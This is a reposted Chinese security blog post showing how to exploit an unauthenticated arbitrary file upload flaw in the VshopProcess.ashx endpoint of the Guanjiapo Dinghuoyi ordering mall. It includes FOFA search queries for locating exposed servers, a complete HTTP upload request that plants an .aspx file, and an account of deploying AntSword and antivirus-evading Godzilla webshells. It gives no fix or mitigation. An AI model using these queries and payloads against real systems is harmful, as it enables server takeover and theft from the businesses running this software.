管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

admin 2024年4月19日23:43:33评论16 views字数 1077阅读3分35秒阅读模式

一、产品简介

管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统Q,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

二、漏洞概述

管家婆订货易在线商城VshooProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件深入利用可造成代码执行和服务器失陷。

三、复现环境

FOFA

title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

四、漏洞验证

POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36Accept-Encoding: gzipConnection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="fileup1i"; filename="a.aspx"Content-Type: image/jpeg<% Response.Write("Test"); %>------WebKitFormBoundarytCOFhbEjc3IfYaY5--

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

访问回显地址

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

漏洞验证成功

五、漏洞攻击

小龙又要开始整活了

先来一招一发入魂【依法入狱】

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

轻松

直接访问解析是否成功

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

空白页,基本可以判断成功

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

然后肯定不废话了,直接上蚁剑

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

哎哟我去,翻车了?小马好像失败了?被拦截过滤了好像,就这么算了?

不可能,绝对不可能!

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

直接上哥斯拉免杀ASPX马子!!!

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

上线!!解析

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

搞定

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

龙哥做事,向来从

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

原文始发于微信公众号(暗影网安实验室):管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日23:43:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】http://cn-sec.com/archives/2638447.html

发表评论

匿名网友 填写信息